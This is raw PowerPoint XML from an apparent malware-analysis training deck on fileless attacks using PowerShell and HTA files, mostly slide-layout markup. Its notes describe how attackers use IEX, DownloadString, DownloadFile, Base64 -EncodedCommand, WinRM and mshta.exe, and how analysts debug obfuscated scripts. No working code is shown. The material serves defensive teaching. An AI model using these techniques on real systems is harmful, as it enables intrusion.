            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5395716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4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{51998215-B6DA-6840-93A7-8744EF3D5C54}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4889365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4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{51998215-B6DA-6840-93A7-8744EF3D5C54}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14056049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4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{51998215-B6DA-6840-93A7-8744EF3D5C54}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30136087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Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{51998215-B6DA-6840-93A7-8744EF3D5C54}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2730648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err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a task-based command line shell and scripting language.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is specifically designed so that system administrators and advanced users can manage several systems at the same time, even on different architectures. As well as the processes related to the applications of those systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is based on the .NET Framework CLR (Common Language Runtime) and .NET Framework, accepting and returning .NET objects. In other words, the output of each command is an object, allowing the output object to be sent to another command as input.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The main reason why many attackers choose to use Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to carry out their fileless attacks is its great potential as a scripting language, also allowing full access to the internal core of the operating system and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> windows API.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As it is also an inherent part of the Microsoft Windows operating system itself, it is considered a safe tool.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> scripts can be dynamically loaded into memory without touching the storage medium.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers often use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in the post-exploitation phase to download additional components. Files like .LNK, WSF, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, VBScript or Microsoft Office documents allow you to run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> script directly or indirectly. Once the attacker manages to trick the victim into opening a malicious attachment through phishing campaigns.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> allows the passing of Base64-encoded parameters via the -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>EncodeCommand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> flag, a feature widely used by attackers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ability to be executed remotely through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WinRM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>(Windows Remote Management). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This feature allows attackers to break through the windows firewall, remotely execute scripts, or operate a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> session interactively.</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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2544025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The easiest method of parsing a single command will be to run it in the interactive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> console.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> commands are easy to understand, however the analyst will find obfuscating commands and the easiest way to analyze them will be dynamically to be able to infer how they work.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The analyst can have control over the execution of the script's commands by debugging it using PowerShell ISE (Integrate Scripting Environment).</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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2853270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err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> has restrictions on executing scripts through the console or by double-clicking on the PS1 file, so it is rare for attackers to send these scripts directly. That is why they use, as we have said before, other types of intermediate files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Invoke-Expression(IEX). This cmdlet evaluates or executes a string passed as a command.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Invoke-Command.  This cmdlet can run a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> command on both a local and a remote device.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Start-Process.  Starts a process from a given file path.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. This method of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>System.Net.Webclient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Webclient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) downloads a resource from a URL as a string.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DownloadFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(). Also from the class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Webclient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. Downloads a file from a URL to a local file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Here you have one of the many links that talk about the use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for offensive themes.</a:t>
            </a:r>
          </a:p>
          <a:p>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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3003148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1200" dirty="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Monnappa's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> blog we can find examples of attacks where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> is used.</a:t>
            </a:r>
          </a:p>
          <a:p>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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22053624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In 2003 Microsoft introduced HTA, (HTML Applications). It basically consists of allowing developers to create web applications for Microsoft Internet Explorer but without enforcing the strict security model and user interface of web browsers. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The programs are based on html code and one or more scripting languages VBScript or JScript. A wonder for MW developers. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The usual attack is implemented in two stages, in a first stage, the attacker manages to send a Trojan to the victim by making one of the ActiveX components or another method. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In a second stage, the Trojan loads the system application mshta.exe with scripts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from a malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Although the idea was scrapped and removed from later versions of Internet Explorer , the engine that does the actual work mshta.exe is still present in the system to support legacy applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>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9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27673220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Some examples of creating HTA files, a "Hello world" and a reverse shell.</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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1162481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Example of a recent attack using this type of files</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Marcador de pie de página 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Marcador de número de diapositiva 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{51998215-B6DA-6840-93A7-8744EF3D5C54}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10004726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 World">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 7"/>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1571627"/>
            <a:ext cx="9144000" cy="19942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0" descr="WG_logo_Color_3in.png"/>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190729" y="166482"/>
            <a:ext cx="1964641" cy="5727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355600" y="2415780"/>
            <a:ext cx="8040914" cy="506015"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432946" y="4000501"/>
            <a:ext cx="3289968" cy="837851"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>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4159239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800">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="769351"/>
            <a:ext cx="8229600" cy="383137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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{EF611178-6C3A-F247-8731-699DBDA96700}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9653040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orld on Right">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="screen">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-1492"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7119256" y="-71438"/>
            <a:ext cx="2024743"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8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7785462" y="4609046"/>
            <a:ext cx="1358537" cy="375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2" y="205980"/>
            <a:ext cx="5766263" cy="506015"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457202" y="769351"/>
            <a:ext cx="5679553" cy="3825272"/>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4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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
